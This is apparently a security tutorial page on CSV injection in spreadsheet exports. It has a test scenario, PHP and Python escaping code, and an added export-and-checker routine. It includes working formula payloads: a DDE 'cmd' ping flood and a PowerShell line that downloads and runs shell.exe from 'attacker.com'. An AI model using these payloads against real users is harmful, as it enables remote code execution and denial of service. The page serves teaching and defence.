Sumeru Cyber Security
Csv Injection


Last updated 5 years ago

Introduction

Many web applications allow users to download content such as invoice templates or user settings as a CSV file. Many users then open that CSV file in Excel, LibreOffice or OpenOffice. When the web application does not properly validate the contents it writes to the CSV file, the contents of one or more cells may be executed as formulas by the spreadsheet program.

When a spreadsheet program is used to open a CSV, any cell starting with '=' is interpreted by the software as a formula. Maliciously crafted formulas can be used for three key attacks:

  • Hijacking the user’s computer by exploiting vulnerabilities in the spreadsheet software.

  • Hijacking the user’s computer by exploiting the user’s tendency to ignore security warnings in spreadsheets that they downloaded from their own website.

  • Exfiltrating contents from the spreadsheet, or other open spreadsheets.

How to Test

Let us assume an attack scenario in the Student Record Management system of a school. The application allows teachers to enter the details of students in the school. The attacker gets access to the application and wants every teacher using the application to be compromised, so the attacker tries to perform a CSV injection attack through the web application.

The attacker needs to steal other students’ details, so the attacker uses the HYPERLINK formula and enters it while entering student details.

When the teacher exports the CSV and clicks on the hyperlink, the sensitive data is sent to the attacker’s server.

The exported CSV file contains the malicious payload.

The student’s details are logged on the attacker’s web server.

We can also turn the victim’s system into a bot for DoS attacks. Through this, the victim’s system can be made to send unlimited ping requests to any target server. When many systems are affected through this CSV injection attack, the target server is flooded with requests, which ultimately results in downtime for that server.

The malicious payload sent to the server and saved in the database:

=cmd|'/C ping -t 192.168.x.xxx -l 25152'!'A1'

When the victim exports the CSV, the payload is exported into the CSV file, and when the victim opens the CSV file using MS Excel, the warning below is shown to the victim.

Since the victim downloaded the CSV file from a trusted source, they click on “Yes”. MS Excel then runs the payload and starts sending ping requests to the target server.

How to Fix

The best way to mitigate this type of attack is to make sure all user input is filtered so that only expected characters are allowed. Ensure that no cell begins with any of the following characters:

  • Equals to (“=”)

  • Plus (“+”)

  • Minus (“-”)

  • At (“@”)

If it is necessary, however, to accept these characters, the application must encode any cell value that might otherwise be interpreted as a formula. This is accomplished by preceding cell values that begin with the characters +, -, =, or @ with a single quote. This is termed “escaping” or “neutralizing” the characters, and it ensures that such cell values are interpreted as data and not as formulas.

PHP

class CsvEscaper
{
    // Characters that spreadsheet software may interpret as the start of a formula.
    private static $triggers = array( '=', '+', '-', '@', '|', '%' );

    public static function escape_csv( $payload )
    {
        // Prefix with a single quote so the cell is read as text, not as a formula.
        if ( in_array( mb_substr( $payload, 0, 1 ), self::$triggers, true ) ) {
            $payload = "'" . $payload . "'";
        }
        return $payload;
    }
}

PYTHON

def escape(payload):
    # Neutralise a cell that a spreadsheet would otherwise interpret as a formula.
    if payload and payload[0] in ('@', '+', '-', '=', '|', '%'):
        payload = payload.replace("|", "\\|")
        payload = "'" + payload + "'"
    return payload
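Added example, not part of the original page: a complete CSV export routine that applies the neutralization described under "How to Fix", plus a checker for the "How to Test" step that scans an exported file for cells still starting with a trigger character. The student records are constructed sample data; skipping leading whitespace before the check is an assumption made on the strict side (the page's code checks only the first character).

```python
import csv
import io

# Characters the page lists as formula triggers in Excel / LibreOffice.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "|", "%")
HEADER = ["name", "note", "age"]

# Constructed sample records: row 1 carries the page's ping payload, rows 3 and 4
# hold benign values that nevertheless start with trigger characters.
STUDENT_ROWS = [
    ("Alice", "=cmd|'/C ping -t 192.168.x.xxx -l 25152'!'A1'", 17),
    ("Bob", "Transferred from Lincoln High", 16),
    ("Carol, Jr.", "+1 555 0100", 18),
    ("Dave", "-", 15),
]


def neutralize_cell(value):
    """Prefix a string cell with a single quote if a spreadsheet would run it.

    Non-strings (ints, floats, None) pass through so numeric columns stay numeric.
    Leading whitespace is skipped before the check (assumption, stricter than the page).
    """
    if not isinstance(value, str) or not value:
        return value
    if value.lstrip(" \t\r\n")[:1] in FORMULA_TRIGGERS:
        return "'" + value
    return value


def export_csv(header, rows, neutralize=True):
    """Render rows as CSV text. csv.writer quotes commas, quotes and newlines,
    so a value cannot escape its own cell; neutralize_cell stops formulas."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_MINIMAL, lineterminator="\n")
    writer.writerow(header)
    for row in rows:
        writer.writerow([neutralize_cell(v) if neutralize else v for v in row])
    return buf.getvalue()


def find_formula_cells(csv_text):
    """Test helper: (row, col, value) for every cell of an export that still
    begins with a trigger character. An empty list means the fix held."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if cell.lstrip(" \t\r\n")[:1] in FORMULA_TRIGGERS:
                hits.append((r, c, cell))
    return hits
```

Running `find_formula_cells` on `export_csv(HEADER, STUDENT_ROWS, neutralize=False)` flags the payload and the two benign cells; on the neutralized export it returns an empty list, which is the check to repeat against a real download after deploying the fix.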

So we can take this attack further. We can install a shell on the victim’s system using the payload below:

=cmd|' /C powershell Invoke-WebRequest "http://www.attacker.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1

Using this shell we can perform many further attacks.

References

https://owasp.org/www-community/attacks/CSV_Injection
https://payatu.com/csv-injection-basic-to-exploit
https://blog.zsec.uk/csv-dangers-mitigations/
https://www.veracode.com/blog/secure-development/data-extraction-command-execution-csv-injection